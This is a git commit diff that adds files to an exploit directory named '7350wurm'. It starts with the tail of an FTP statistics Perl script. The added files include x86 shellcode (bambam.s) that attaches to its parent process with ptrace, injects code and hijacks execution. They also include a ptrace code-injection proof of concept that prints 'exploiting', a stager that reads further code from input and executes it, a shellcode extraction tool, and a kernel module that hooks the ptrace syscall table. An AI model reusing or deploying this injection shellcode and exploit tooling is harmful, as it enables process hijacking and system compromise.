+                  $domainbytes{$domain}/$domainsecs{$domain}/1000);
+   $pctfiles = sprintf("%8.2f", 100 * $domainfiles{$domain} / $xferfiles);
+   $pctbytes = sprintf("%8.2f", 100 * $domainbytes{$domain} / $xferbytes);
+   write;
+}
+print "\n";
+print "These figures only reflect ANONYMOUS FTP transfers.  There are many\n";
+print "sites which mount the archives via NFS, and those transfers are not\n";
+print "logged and reported by this program.\n\n";
+}
+if ($opt_h) {
+format top8 =
+Hourly Transmission Statistics
+                 Number Of    Number of    Average    Percent Of  Percent Of
+     Time        Files Sent  Bytes  Sent  Xmit  Rate  Files Sent  Bytes Sent
+---------------  ----------  -----------  ----------  ----------  ----------
+.
+format line8 =
+@<<<<<<<<<<<<<<  @>>>>>>>>>  @>>>>>>>>>>  @>>>>>>>>>  @>>>>>>>    @>>>>>>>  
+$time,           $nfiles,    $nbytes,     $avgrate,   $pctfiles,  $pctbytes
+.
+$| = 1;
+$- = 0;
+$^ = top8;
+$~ = line8;
+foreach $time ( sort keys(xfertbytes) ) {
+   $nfiles   = $xfertfiles{$time};
+   $nbytes   = $xfertbytes{$time};
+   $avgrate  = sprintf("%5.1f KB/s", $xfertbytes{$time}/$xfertsecs{$time}/1000);
+   $pctfiles = sprintf("%8.2f", 100*$xfertfiles{$time} / $xferfiles);
+   $pctbytes = sprintf("%8.2f", 100*$xfertbytes{$time} / $xferbytes);
+   write;
+}
+}
+exit(0);
+sub datecompare {
+   $date1  = substr($a, 11, 4) * 4800;
+   $date2  = substr($b, 11, 4) * 4800;
+   $date1 += index("JanFebMarAprMayJunJulAugSepOctNovDec",substr($a, 4, 3))*100;
+   $date2 += index("JanFebMarAprMayJunJulAugSepOctNovDec",substr($b, 4, 3))*100;
+   $date1 += substr($a, 8, 2);
+   $date2 += substr($b, 8, 2);
+   $date1 - $date2;
+}
+sub domnamcompare {
+   $sdiff = length($a) - length($b);
+   ($sdiff < 0) ? -1 : ($sdiff > 0) ? 1 : ($a lt $b) ? -1 : ($a gt $b) ? 1 : 0;
+}
+sub bytecompare {
+   $bdiff = $groupbytes{$b} - $groupbytes{$a};
+   ($bdiff < 0) ? -1 : ($bdiff > 0) ? 1 : ($a lt $b) ? -1 : ($a gt $b) ? 1 : 0;
+}
+sub faccompare {
+   $fdiff = $fac{$b} - $fac{$a};
+   ($fdiff < 0) ? -1 : ($fdiff > 0) ? 1 : ($a lt $b) ? -1 : ($a gt $b) ? 1 : 0;
+}
diff --git a/exploits/7350wurm/shellcode/bambam.s b/exploits/7350wurm/shellcode/bambam.s
new file mode 100644
index 0000000..5719ed7
--- /dev/null
+++ b/exploits/7350wurm/shellcode/bambam.s
@@ -0,0 +1,230 @@
+        .globl  cbegin
+        .globl  cend
+cbegin:
+/* getppid */
+        pushl   $64
+        popl    %eax
+        int     $0x80
+/*      movl    %eax, %ecx      */
+        pushl   %eax
+        xchgl   %ebp, %eax
+        
+/* z_fork */
+        pushl   $2
+        popl    %eax
+        int     $0x80
+        or      %eax, %eax
+        je      fchild
+        /* waitpid (pid, NULL, 0) */
+        pushl   $7
+        popl    %esi
+        xchgl   %esi, %eax      /* eax = 7, esi = ppid */
+        xorl    %ecx, %ecx
+        xorl    %edx, %edx
+        int     $0x80
+        xorl    %eax, %eax
+        movb    $162, %al
+        pushl   $10
+        pushl   $10
+        movl    %esp, %ebx
+        movl    %esp, %ecx
+        int     $0x80
+ui:
+jmp ui
+        /* exit */
+fexit:  
+        
+        pushl   $1
+        popl    %eax
+        xorl    %ebx, %ebx
+        int     $0x80
+/*** CHILD ***/
+fchild: pushl   $2              /* second fork */
+        popl    %eax
+        int     $0x80
+        or      %eax, %eax
+        jne     fexit
+        popl    %ecx            /* parent process pid */
+/* ptrace attach */
+        pushl   $26
+        popl    %eax
+        cdq
+        pushl   $16
+        popl    %ebx
+        xorl    %esi, %esi
+        int     $0x80
+        
+/* ptrace peekdata */
+        movl    $0x08048210, %edx
+/*      movl    $0xbf7ff010, %edx */
+        movl    $0xbffff010, %esi       
+        pushl   $127
+        popl    %edi
+loopa:
+        movl    %ebp, %ecx
+        pushl   $26
+        popl    %eax
+        pushl   $2
+        popl    %ebx
+        pushl   %edi
+        int     $0x80
+        popl    %edi
+        incl    %edx
+        incl    %esi
+        decl    %edi
+        jnz     loopa
+/* ptrace getregs */
+        movl    %ebp, %ecx
+        pushl   $26
+        popl    %eax
+        pushl   $12
+        popl    %ebx
+        pusha
+        movl    %esp, %esi
+        int     $0x80
+/* ptrace setregs */
+        movl    %ebp, %ecx
+        pushl   $26
+        popl    %eax
+        pushl   $13
+        popl    %ebx
+        movl    %esp, %esi
+        movl    48(%esi), %edi
+        pushl   %edi
+        movl    $0x08048210, 48(%esi)
+/*      movl    $0xbf7ff010, 48(%esi)*/
+        int     $0x80
+        jmp     pointX
+pointY:
+        popl    %esi
+        movl    $0x08048210, %edx
+        pushl   $20
+        popl    %edi
+loopc:
+        movl    %ebp, %ecx
+        pushl   $26
+        popl    %eax
+        pushl   $5
+        popl    %ebx
+        pushl   %edi
+        pushl   %esi
+        movl    (%esi), %esi
+        int     $0x80 
+        popl    %esi
+        popl    %edi
+        incl    %edx
+        incl    %esi
+        decl    %edi
+        jnz     loopc
+/* ptrace pokedata */
+/*      movl    %ebp, %ecx
+        pushl   $26
+        popl    %eax
+        pushl   $5
+        popl    %ebx
+        movl    $0xccccfeeb, %esi*/
+/*      movl    $0xbf7ff010, %edx*/
+        movl    $0x08048210, %edx
+/*      int     $0x80*/
+/*ptrace cont */
+        movl    %ebp, %ecx
+        pushl   $26
+        popl    %eax
+        cdq
+        pushl   $7
+        popl    %ebx
+        xorl    %esi, %esi
+        int     $0x80
+/* wait 4 */
+/* 0 on return */
+        cdq
+        movl    %eax, %ebx
+        decl    %ebx
+        movl    %eax, %ecx
+        movb    $114, %al
+        int     $0x80   
+/* ptrace pokedata */   
+        movl    $0x08048210, %edx
+        movl    $0xbffff010, %esi
+/*      movl    $0xbf7ff010, %edx*/
+        pushl   $127
+        popl    %edi
+loopb:
+        movl    %ebp, %ecx
+        pushl   $26
+        popl    %eax
+        pushl   $5
+        popl    %ebx
+        pushl   %edi
+        pushl   %esi
+        movl    (%esi), %esi
+        int     $0x80 
+        popl    %esi
+        popl    %edi
+        incl    %edx
+        incl    %esi
+        decl    %edi
+        jnz     loopb
+/* ptrace setregs */
+        popl    %edi
+        movl    %ebp, %ecx
+        pushl   $26
+        popl    %eax
+        pushl   $13
+        popl    %ebx
+        movl    %esp, %esi
+        movl    %edi, 48(%esi)
+        int     $0x80
+/* ptrace detach */
+        movl    %ebp, %ecx
+        pushl   $17
+        popl    %ebx
+        pushl   $26
+        popl    %eax
+        cdq
+        movl    %edx, %esi
+        int     $0x80
+/* exit */      
+        xorl    %ecx, %ecx
+        incl    %esi
+        xchgl   %esi, %eax
+        int     $0x80
+pointX:
+        call    pointY
+        pushl   $2              /* second fork */
+        popl    %eax
+        int     $0x80
+        or      %eax, %eax
+        je      pointA
+        int     $0x3
+pointA: 
+        jmp     pointA
+        
+        
+                
+        
+cend:
diff --git a/exploits/7350wurm/shellcode/codedump b/exploits/7350wurm/shellcode/codedump
new file mode 100644
index 0000000..d442fa7
--- /dev/null
+++ b/exploits/7350wurm/shellcode/codedump
Binary files differ
diff --git a/exploits/7350wurm/shellcode/codedump.c b/exploits/7350wurm/shellcode/codedump.c
new file mode 100644
index 0000000..9494b9e
--- /dev/null
+++ b/exploits/7350wurm/shellcode/codedump.c
@@ -0,0 +1,93 @@
+/* shellcode extraction utility,
+ * by type / teso, small mods by scut.
+ */
+#include <stdio.h>
+#include <stdlib.h>
+#include <ctype.h>
+#ifdef IRIX
+#include <sys/cachectl.h>
+#endif
+#ifdef HPUX
+extern char *   cbegin;
+extern char *   cend;
+#else
+extern void     cbegin ();
+extern void     cend ();
+#endif
+typedef void (* fptr)(void);
+int
+bad (unsigned char u);
+int
+main (int argc, char *argv[])
+{
+        int             i,
+                        bbytes = 0;
+        unsigned char * buf = (unsigned char *) cbegin;
+        unsigned char   ebuf[1024];
+        fptr            ebuf_p = (fptr) &ebuf[0];
+        fprintf (stderr, "/* %lu byte shellcode */\n",
+                (unsigned long int) cend - (unsigned long int) cbegin);
+        for (i = 0 ; buf < (unsigned char *) cend; ++buf) {
+                if (i % 12 == 0 && buf > (unsigned char *) cbegin)
+                        printf ("\n");
+                if (i % 12 == 0)
+                        printf ("\"");
+                if (bad (*buf & 0xff)) {
+                        printf ("_\\x%02x_", *buf & 0xff);
+                        bbytes += 1;
+                } else {
+                        printf ("\\x%02x", *buf & 0xff);
+                }
+                if (++i >= 12) {
+                        i = 0;
+                        printf ("\"");
+                }
+        }
+        if (i % 12 == 0)
+                printf (";\n");
+        else
+                printf ("\";\n");
+        printf("\n");
+        fprintf (stderr, "bad bytes = %d\n", bbytes);
+        if (argc > 1) {
+                memcpy (ebuf, cbegin, (unsigned long int) cend -
+                        (unsigned long int) cbegin);
+#ifdef IRIX
+                memcpy (ebuf + ((unsigned long int) cend -
+                        (unsigned long int) cbegin), "/bin/sh\x42_ABCDEFGHIJKLMNOPQRSTUVWXYZ", 40);
+                cacheflush (ebuf, sizeof (ebuf), BCACHE);
+#endif
+                ebuf_p ();
+        }
+        exit (EXIT_SUCCESS);
+}
+int
+bad (unsigned char u)
+{
+        if (u == '\x00' || u == '\x0a' || u == '\x0d' || u == '\x25')
+                return (1);
+        return (0);
+}
diff --git a/exploits/7350wurm/shellcode/pt/Makefile b/exploits/7350wurm/shellcode/pt/Makefile
new file mode 100644
index 0000000..e5e1fd5
--- /dev/null
+++ b/exploits/7350wurm/shellcode/pt/Makefile
@@ -0,0 +1,8 @@
+all:    rptrace.c
+        rm -f rptrace.o
+        gcc -c -I/usr/src/linux/include -O2 -Wall rptrace.c -o rptrace.o
+clean:
+        rm -f rptrace.o
diff --git a/exploits/7350wurm/shellcode/pt/README b/exploits/7350wurm/shellcode/pt/README
new file mode 100644
index 0000000..0139382
--- /dev/null
+++ b/exploits/7350wurm/shellcode/pt/README
@@ -0,0 +1,6 @@
+This is a *simple* HACK to get around the ptrace/exec security problem
+in linux <2.2.19. It simply disables ptrace for everyone except root.
+Just make, and insmod the .o .. and your uptime will be preserved! :P
+-MadCamel (madcamel@energymech.net)
diff --git a/exploits/7350wurm/shellcode/pt/rptrace.c b/exploits/7350wurm/shellcode/pt/rptrace.c
new file mode 100644
index 0000000..f7de48b
--- /dev/null
+++ b/exploits/7350wurm/shellcode/pt/rptrace.c
@@ -0,0 +1,42 @@
+#define MODULE
+#define __KERNEL__
+#include <linux/module.h> 
+#include <linux/kernel.h>
+#include <sys/syscall.h>
+#include <linux/smp_lock.h>
+#include <linux/capability.h>  
+struct task_struct *init_hook = NULL;
+extern void *sys_call_table[];
+int (*o_ptrace)(int, int, int, int);
+int n_ptrace(int req, int pid, int addr, int data)
+{
+        int r;
+        
+        r = o_ptrace(req, pid, addr, data);
+        printk ("PTRACE (%08x, %08x, %08x, %08x) = %08x\n", req, pid, addr, data, r);
+        return (r);
+}
+#define REPLACE(x) o_##x = sys_call_table[__NR_##x];\
+                        sys_call_table[__NR_##x] = n_##x
+int init_module(void)
+{
+        lock_kernel();
+        EXPORT_NO_SYMBOLS;
+        REPLACE(ptrace);
+        unlock_kernel();
+        return(0);
+}
+#define RESTORE(x) sys_call_table[__NR_##x] = o_##x
+int cleanup_module(void)
+{
+        lock_kernel();
+        RESTORE(ptrace);
+        unlock_kernel();
+        return(0);
+}
diff --git a/exploits/7350wurm/shellcode/pt/rptrace.o b/exploits/7350wurm/shellcode/pt/rptrace.o
new file mode 100644
index 0000000..dd3bc56
--- /dev/null
+++ b/exploits/7350wurm/shellcode/pt/rptrace.o
Binary files differ
diff --git a/exploits/7350wurm/shellcode/pt/x.tar.gz b/exploits/7350wurm/shellcode/pt/x.tar.gz
new file mode 100644
index 0000000..06ba614
--- /dev/null
+++ b/exploits/7350wurm/shellcode/pt/x.tar.gz
Binary files differ
diff --git a/exploits/7350wurm/shellcode/ptrace/ptrace-legit b/exploits/7350wurm/shellcode/ptrace/ptrace-legit
new file mode 100644
index 0000000..e3e02c1
--- /dev/null
+++ b/exploits/7350wurm/shellcode/ptrace/ptrace-legit
Binary files differ
diff --git a/exploits/7350wurm/shellcode/ptrace/ptrace-legit.c b/exploits/7350wurm/shellcode/ptrace/ptrace-legit.c
new file mode 100644
index 0000000..870da8a
--- /dev/null
+++ b/exploits/7350wurm/shellcode/ptrace/ptrace-legit.c
@@ -0,0 +1,192 @@
+/* -scutstyle */
+#include <sys/types.h>
+#include <sys/ptrace.h>
+#include <sys/wait.h>
+#include <sys/user.h>
+#include <unistd.h>
+#include <stdlib.h>
+#include <stdio.h>
+pid_t z_fork (void);
+void hexdump (unsigned char *data, unsigned int amount);
+unsigned char   shellcode[] = "\x90\x90\xcc\x73";
+int
+main (int argc, char *argv[])
+{
+        pid_t                   cpid;
+        struct user             regs;
+        unsigned long int       safed_eip;
+        unsigned long int       addr,
+                                addr_walker;
+        unsigned char           data_saved[256];
+#if 0
+        if (argc != 2 || sscanf (argv[1], "%d", &cpid) != 1) {
+                printf ("usage: %s <pid>\n", argv[0]);
+                exit (EXIT_FAILURE);
+        }
+#endif
+        cpid = getppid();
+        if (z_fork () != 0) {
+                printf ("parent. exiting.\n");
+                exit (EXIT_FAILURE);
+        }
+        printf ("pid = %d\n", cpid);
+        printf ("exploiting\n\n");
+        if (ptrace (PTRACE_ATTACH, cpid, NULL, NULL) < 0) {
+                perror ("ptrace");
+                exit (EXIT_FAILURE);
+        }
+        /* save data */
+        addr = 0xbffff010;
+        for (addr_walker = 0 ; addr_walker < 256 ; ++addr_walker) {
+                data_saved[addr_walker] = ptrace (PTRACE_PEEKDATA, cpid,
+                        addr + addr_walker, NULL);
+        }
+        hexdump (data_saved, sizeof (data_saved));
+        /* write */
+        for (addr_walker = 0 ; addr_walker < sizeof (shellcode) ;
+                ++addr_walker)
+        {
+                ptrace (PTRACE_POKEDATA, cpid, addr + addr_walker,
+                        shellcode[addr_walker] & 0xff);
+        }
+        /* redirect eip */
+        memset (&regs, 0, sizeof (regs));
+        if (ptrace (PTRACE_GETREGS, cpid, NULL, &regs) < 0) {
+                perror ("ptrace PTRACE_GETREGS");
+                exit (EXIT_FAILURE);
+        }
+        // write eip */
+        safed_eip = regs.regs.eip;
+        regs.regs.eip = 0xbffff010;
+        if (ptrace (PTRACE_SETREGS, cpid, NULL, &regs) < 0) {
+                perror ("ptrace PTRACE_GETREGS");
+                exit (EXIT_FAILURE);
+        }
+        if (ptrace (PTRACE_CONT, cpid, NULL, NULL) < 0) {
+                perror ("ptrace PTRACE_CONT");
+                exit (EXIT_FAILURE);
+        }
+        wait (NULL);
+        printf ("detrap\n");
+        /* restore */
+        for (addr_walker = 0 ; addr_walker < 256 ; ++addr_walker) {
+                ptrace (PTRACE_POKEDATA, cpid, addr + addr_walker,
+                        data_saved[addr_walker] & 0xff);
+        }
+        /* restore regs */
+        regs.regs.eip = safed_eip;
+        if (ptrace (PTRACE_SETREGS, cpid, NULL, &regs) < 0) {
+                perror ("ptrace PTRACE_GETREGS");
+                exit (EXIT_FAILURE);
+        }
+        if (ptrace (PTRACE_DETACH, cpid, NULL, NULL) < 0) {
+                perror ("ptrace PTRACE_DETACH");
+                exit (EXIT_FAILURE);
+        }
+        exit (EXIT_SUCCESS);
+}
+void
+hexdump (unsigned char *data, unsigned int amount)
+{
+        unsigned int    dp, p;  /* data pointer */
+        const char      trans[] =
+                "................................ !\"#$%&'()*+,-./0123456789"
+                ":;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklm"
+                "nopqrstuvwxyz{|}~...................................."
+                "....................................................."
+                "........................................";
+        for (dp = 1; dp <= amount; dp++) {
+                printf ("%02x ", data[dp-1]);
+                if ((dp % 8) == 0)
+                        printf (" ");
+                if ((dp % 16) == 0) {
+                        printf ("| ");
+                        p = dp;
+                        for (dp -= 16; dp < p; dp++)
+                                printf ("%c", trans[data[dp]]);
+                        printf ("\n");
+                }
+        }
+        if ((amount % 16) != 0) {
+                p = dp = 16 - (amount % 16);
+                for (dp = p; dp > 0; dp--) {
+                        printf ("   ");
+                        if (((dp % 8) == 0) && (p != 8))
+                                printf (" ");
+                }
+                printf (" | ");
+                for (dp = (amount - (16 - p)); dp < amount; dp++)
+                        printf ("%c", trans[data[dp]]);
+        }
+        printf ("\n");
+        return;
+}
+/* z_fork
+ *
+ * fork and detach forked client completely to avoid zombies.
+ * taken from richard stevens excellent system programming book :) thanks,
+ * whereever you are now.
+ *
+ * caveat: the pid of the child has already died, it can just be used to
+ *         differentiate between parent and not parent, the pid of the
+ *         child is inaccessibly.
+ *
+ * return pid of child for old process
+ * return 0 for child
+ */
+pid_t
+z_fork (void)
+{
+        pid_t   pid;
+        pid = fork ();
+        if (pid < 0) {
+                return (pid);
+        } else if (pid == 0) {
+                /* let the child fork again
+                 */
+                pid = fork ();
+                if (pid < 0) {
+                        return (pid);
+                } else if (pid > 0) {
+                        /* let the child and parent of the second child
+                         * exit
+                         */
+                        exit (EXIT_SUCCESS);
+                }
+                return (0);
+        }
+        waitpid (pid, NULL, 0);
+        return (pid);
+}
diff --git a/exploits/7350wurm/shellcode/t b/exploits/7350wurm/shellcode/t
new file mode 100644
index 0000000..eb3478b
--- /dev/null
+++ b/exploits/7350wurm/shellcode/t
Binary files differ
diff --git a/exploits/7350wurm/shellcode/t.c b/exploits/7350wurm/shellcode/t.c
new file mode 100644
index 0000000..7c1aa4f
--- /dev/null
+++ b/exploits/7350wurm/shellcode/t.c
@@ -0,0 +1,12 @@
+#include <stdio.h>
+int
+main (int argc, char *argv[])
+{
+        char *  foo[4] = { "./codedump", "a", "b", NULL };
+        execve (foo[0], foo, NULL);
+}
diff --git a/exploits/7350wurm/shellcode/write-read-exec.s b/exploits/7350wurm/shellcode/write-read-exec.s
new file mode 100644
index 0000000..6f3956c
--- /dev/null
+++ b/exploits/7350wurm/shellcode/write-read-exec.s
@@ -0,0 +1,38 @@
+        .globl  cbegin
+        .globl  cend
+cbegin:
+/* write: ebx = fd, ecx = where, edx = length, eax = 4 */
+wr_pos: xorl    %ebx, %ebx
+        incl    %ebx            /* ebx = 1 */
+        movl    $0x0b51740b, %eax
+        subl    $0x01010101, %eax
+        push    %eax
+        movl    %esp, %ecx      /* ecx = "AAA\n" */
+        push    $0x04
+        pop     %eax            /* eax = 4 */
+        movl    %eax, %edx
+        int     $0x80           /* write (1, "AAA\n", 4) */
+        jmp     ctramp
+rd_cde: xorl    %ebx, %ebx
+        mull    %ebx            /* ebx = eax = edx = 0 */
+        decb    %dl             /* edx = 0xff */
+        popl    %ecx            /* ecx = ncode */
+        push    $0x3
+        pop     %eax
+        int     $0x80           /* read (0, ncode, 0xff) */
+        jmp     ncode
+ctramp: call    rd_cde
+ncode:
+cend:
diff --git a/exploits/7350wurm/timoglaser.txt b/exploits/7350wurm/timoglaser.txt
new file mode 100644
index 0000000..000e74e
--- /dev/null
+++ b/exploits/7350wurm/timoglaser.txt
@@ -0,0 +1,3 @@
+"unknown banners" instead of "unknown banner"
+given 2002/01/28
author	Root THC	2026-02-24 12:42:47 +0000
committer	Root THC	2026-02-24 12:42:47 +0000
commit	c9cbeced5b3f2bdd7407e29c0811e65954132540 (patch)
tree	aefc355416b561111819de159ccbd86c3004cf88 /exploits/7350wurm
parent	073fe4bf9fca6bf40cef2886d75df832ef4b6fca (diff)